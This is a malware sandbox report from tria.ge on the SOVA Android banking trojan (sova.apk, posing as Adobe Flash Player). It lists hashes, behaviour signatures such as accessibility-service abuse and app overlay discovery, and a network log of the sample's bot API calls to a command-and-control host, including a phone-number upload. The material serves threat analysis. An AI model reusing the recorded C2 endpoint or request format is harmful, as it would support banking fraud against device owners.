Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

6

sova.apk

android-10-x64

10

sova.apk

android-11-x64

10

sova.apk

android-13-x64

8

sova.apk

android-9-x86

10

Resubmissions

24/04/2024, 11:50 UTC

240424-nzl72ahe3w 10

12/04/2024, 13:59 UTC

240412-ravpnaah86 10

28/02/2024, 13:25 UTC

240228-qnw9zacf2t 8

28/02/2024, 12:56 UTC

240228-p6fjhacb22 10

19/02/2024, 08:01 UTC

240219-jw15kaba7y 10

03/01/2024, 08:46 UTC

240103-kpajpscdcp 10

Analysis

  • max time kernel
    274s
  • max time network
    307s
  • platform
    android_x64
  • resource
    android-33-x64-arm64-20240229-en
  • resource tags

    androidarch:arm64arch:x64image:android-33-x64-arm64-20240229-enlocale:en-usos:android-13-x64system
  • submitted
    12/04/2024, 13:59 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sova.apk

  • Size

    569KB

  • MD5

    01b6f0220794476fe19a54c049600ab3

  • SHA1

    eb9dfde47a393bca666e947f285f16c20baf6c32

  • SHA256

    8a6889610a18296e812fabd0a4ceb8b75caadc5cec1b39e8173c3e0093fd3a57

  • SHA512

    ac3031a6dbc5bb0d1e609979336487f14efe58f8e87480e5ef7f79c2abae56977ca444bbb5bbc7970d9c416f9c754b9fedf2bdef3b7b311c2e95e07350f9c892

  • SSDEEP

    12288:C89uYjYV1jiNQ7l5DFQo2d8GmEFDipRdWp8+iZiZ5t:9jYniCF6d8iiXg825t

Score
8/10
bankercollectiondiscoveryevasion

Malware Config

Signatures

  • Makes use of the framework's Accessibility service 2 TTPs 2 IoCs

    Retrieves information displayed on the phone screen using AccessibilityService.

    collectionevasion
  • Queries a list of all the installed applications on the device (Might be used in an attempt to overlay legitimate apps) 1 TTPs
    bankerdiscovery
  • Queries the phone number (MSISDN for GSM devices) 1 TTPs
    discovery
  • Requests enabling of the accessibility settings. 1 IoCs
  • Acquires the wake lock 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Requests disabling of battery optimizations (often used to enable hiding in the background). 1 TTPs 1 IoCs
    evasion

Processes

  • com.adobe.flashplayer
    1⤵
    • Makes use of the framework's Accessibility service
    • Requests enabling of the accessibility settings.
    • Acquires the wake lock
    • Requests disabling of battery optimizations (often used to enable hiding in the background).
    PID:4301

Network

  • flag-gb
    GET
    http://play.googleapis.com/generate_204
    Remote address:
    216.58.204.74:80
    Request
    GET /generate_204 HTTP/1.1
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36
    Host: play.googleapis.com
    Accept-Encoding: gzip
    Response
    HTTP/1.1 204 No Content
    Content-Length: 0
    Cross-Origin-Resource-Policy: cross-origin
    Date: Fri, 12 Apr 2024 14:00:06 GMT
    Connection: close
  • flag-gb
    GET
    http://play.googleapis.com/generate_204
    Remote address:
    172.217.169.42:80
    Request
    GET /generate_204 HTTP/1.1
    Connection: close
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36
    Host: play.googleapis.com
    Accept-Encoding: gzip
    Response
    HTTP/1.1 204 No Content
    Content-Length: 0
    Cross-Origin-Resource-Policy: cross-origin
    Date: Fri, 12 Apr 2024 14:00:07 GMT
    Connection: close
  • flag-us
    DNS
    www.google.com
    Remote address:
    1.1.1.1:53
    Request
    www.google.com
    IN A
    Response
    www.google.com
    IN A
    216.58.201.100
  • flag-us
    DNS
    api.ipify.org
    Remote address:
    1.1.1.1:53
    Request
    api.ipify.org
    IN A
    Response
    api.ipify.org
    IN A
    172.67.74.152
    api.ipify.org
    IN A
    104.26.13.205
    api.ipify.org
    IN A
    104.26.12.205
  • flag-us
    DNS
    api.ipify.org
    Remote address:
    1.1.1.1:53
    Request
    api.ipify.org
    IN A
  • flag-us
    DNS
    a0545193.xsph.ru
    Remote address:
    1.1.1.1:53
    Request
    a0545193.xsph.ru
    IN A
    Response
    a0545193.xsph.ru
    IN A
    141.8.197.42
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=8a6134a7cccc&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Fri, 12 Apr 2024 14:00:13 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=number.update&botid=8a6134a7cccc&phoneNumber=%2B15551234567
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=number.update&botid=8a6134a7cccc&phoneNumber=%2B15551234567 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Fri, 12 Apr 2024 14:00:13 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=perms&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=8a6134a7cccc&param=perms&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.200.46
  • flag-us
    GET
    https://api.ipify.org/
    Remote address:
    172.67.74.152:443
    Request
    GET / HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone_x86_64 Build/TE1A.220922.033)
    Host: api.ipify.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Date: Fri, 12 Apr 2024 14:00:17 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: keep-alive
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8733bde6af9b93ed-LHR
  • flag-us
    DNS
    lh3.googleusercontent.com
    Remote address:
    1.1.1.1:53
    Request
    lh3.googleusercontent.com
    IN A
    Response
    lh3.googleusercontent.com
    IN CNAME
    googlehosted.l.googleusercontent.com
    googlehosted.l.googleusercontent.com
    IN A
    142.250.180.1
  • flag-us
    DNS
    remoteprovisioning.googleapis.com
    Remote address:
    1.1.1.1:53
    Request
    remoteprovisioning.googleapis.com
    IN A
    Response
    remoteprovisioning.googleapis.com
    IN A
    142.250.200.10
    remoteprovisioning.googleapis.com
    IN A
    142.250.187.234
    remoteprovisioning.googleapis.com
    IN A
    216.58.212.234
    remoteprovisioning.googleapis.com
    IN A
    142.250.187.202
    remoteprovisioning.googleapis.com
    IN A
    172.217.16.234
    remoteprovisioning.googleapis.com
    IN A
    216.58.204.74
    remoteprovisioning.googleapis.com
    IN A
    172.217.169.42
    remoteprovisioning.googleapis.com
    IN A
    142.250.180.10
    remoteprovisioning.googleapis.com
    IN A
    216.58.213.10
    remoteprovisioning.googleapis.com
    IN A
    172.217.169.74
    remoteprovisioning.googleapis.com
    IN A
    172.217.169.10
    remoteprovisioning.googleapis.com
    IN A
    142.250.178.10
    remoteprovisioning.googleapis.com
    IN A
    142.250.179.234
    remoteprovisioning.googleapis.com
    IN A
    216.58.201.106
    remoteprovisioning.googleapis.com
    IN A
    142.250.200.42
  • 173.194.76.188:5228
    tls
    128 B
     40 B
     2
    1
  • 142.250.200.36:443
    www.google.com
    tls
    1.0kB
     4.7kB
     8
    8
  • 216.58.204.74:80
    http://play.googleapis.com/generate_204
    http
    485 B
     414 B
     5
    5

    HTTP Request

    GET http://play.googleapis.com/generate_204

    HTTP Response

    204
  • 142.250.200.4:443
    tls, https
    245 B
     40 B
     2
    1
  • 142.250.200.4:443
    www.google.com
    tls
    1.2kB
     4.8kB
     8
    6
  • 142.250.200.36:443
    www.google.com
    tls
    1.0kB
     4.7kB
     8
    8
  • 172.217.169.42:80
    http://play.googleapis.com/generate_204
    http
    485 B
     414 B
     5
    5

    HTTP Request

    GET http://play.googleapis.com/generate_204

    HTTP Response

    204
  • 216.58.201.100:443
    www.google.com
    tls
    1.4kB
     5.7kB
     11
    12
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=screen&value=1
    http
    445 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=number.update&botid=8a6134a7cccc&phoneNumber=%2B15551234567
    http
    453 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=number.update&botid=8a6134a7cccc&phoneNumber=%2B15551234567

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    2.4kB
     360 B
     18
    6

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=perms&value=1
    http
    2.7kB
     360 B
     18
    6

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=8a6134a7cccc&param=perms&value=1
  • 142.250.200.46:443
    android.apis.google.com
    tls
    3.5kB
     7.3kB
     14
    14
  • 172.67.74.152:443
    https://api.ipify.org/
    tls, http
    1.2kB
     6.2kB
     8
    7

    HTTP Request

    GET https://api.ipify.org/

    HTTP Response

    200
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 142.250.187.196:443
    520 B
     10
  • 142.250.187.196:443
    www.google.com
    tls
    8.3kB
     222.8kB
     95
    173
  • 142.250.187.196:443
    www.google.com
    tls
    1.1kB
     5.9kB
     11
    9
  • 216.58.204.78:443
    tls, https
    496 B
     40 B
     3
    1
  • 216.58.204.78:443
    encrypted-tbn0.gstatic.com
    tls
    3.3kB
     42.4kB
     39
    38
  • 142.250.180.1:443
    lh3.googleusercontent.com
    tls
    1.3kB
     10.8kB
     13
    11
  • 142.250.180.1:443
    lh3.googleusercontent.com
    tls
    3.7kB
     65.8kB
     47
    55
  • 142.250.200.4:443
    www.google.com
    tls
    4.9kB
     10.4kB
     32
    30
  • 172.64.41.3:443
    tls, https
    409 B
     40 B
     3
    1
  • 172.64.41.3:443
    chrome.cloudflare-dns.com
    tls
    2.1kB
     4.5kB
     17
    13
  • 142.250.178.3:443
    update.googleapis.com
    tls
    5.1kB
     11.3kB
     22
    18
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    120 B
     2
  • 141.8.197.42:80
    a0545193.xsph.ru
    240 B
     4
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 142.250.200.10:443
    remoteprovisioning.googleapis.com
    tls
    3.5kB
     13.6kB
     16
    16
  • 142.250.180.10:443
    remoteprovisioning.googleapis.com
    tls, https
    12.8kB
     40 B
     6
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    120 B
     2
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 216.58.212.232:443
    tls
    135 B
     40 B
     2
    1
  • 172.217.16.226:443
    tls
    135 B
     40 B
     2
    1
  • 216.58.212.198:80
    468 B
     9
  • 172.217.16.226:443
    tls
    135 B
     40 B
     2
    1
  • 216.58.212.198:443
    tls
    135 B
     40 B
     2
    1
  • 142.250.187.194:443
    tls
    135 B
     40 B
     2
    1
  • 142.250.178.14:443
    tls
    135 B
     40 B
     2
    1
  • 216.239.34.36:443
    tls
    135 B
     40 B
     2
    1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 141.8.197.42:80
    a0545193.xsph.ru
    60 B
     1
  • 224.0.0.251:5353
    3.7kB
     11
  • 142.250.200.4:443
    https
    330 B
     70 B
     1
    1
  • 1.1.1.1:53
    www.google.com
    dns
    60 B
     76 B
     1
    1

    DNS Request

    www.google.com

    DNS Response

    216.58.201.100

  • 1.1.1.1:53
    api.ipify.org
    dns
    118 B
     107 B
     2
    1

    DNS Request

    api.ipify.org

    DNS Request

    api.ipify.org

    DNS Response

    172.67.74.152
    104.26.13.205
    104.26.12.205

  • 1.1.1.1:53
    a0545193.xsph.ru
    dns
    62 B
     78 B
     1
    1

    DNS Request

    a0545193.xsph.ru

    DNS Response

    141.8.197.42

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
     109 B
     1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    142.250.200.46

  • 142.250.187.196:443
    https
    3.5kB
     8.8kB
     12
    13
  • 1.1.1.1:53
    lh3.googleusercontent.com
    dns
    71 B
     116 B
     1
    1

    DNS Request

    lh3.googleusercontent.com

    DNS Response

    142.250.180.1

  • 216.58.204.78:443
    https
    3.7kB
     23.4kB
     14
    23
  • 172.64.41.3:443
    https
    3.4kB
     4.7kB
     10
    10
  • 142.250.178.3:443
    https
    24.5kB
     17.3kB
     61
    73
  • 142.250.200.4:443
    https
    9.4kB
     15.1kB
     72
    61
  • 1.1.1.1:53
    remoteprovisioning.googleapis.com
    dns
    79 B
     319 B
     1
    1

    DNS Request

    remoteprovisioning.googleapis.com

    DNS Response

    142.250.200.10
    142.250.187.234
    216.58.212.234
    142.250.187.202
    172.217.16.234
    216.58.204.74
    172.217.169.42
    142.250.180.10
    216.58.213.10
    172.217.169.74
    172.217.169.10
    142.250.178.10
    142.250.179.234
    216.58.201.106
    142.250.200.42

MITRE ATT&CK Mobile v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.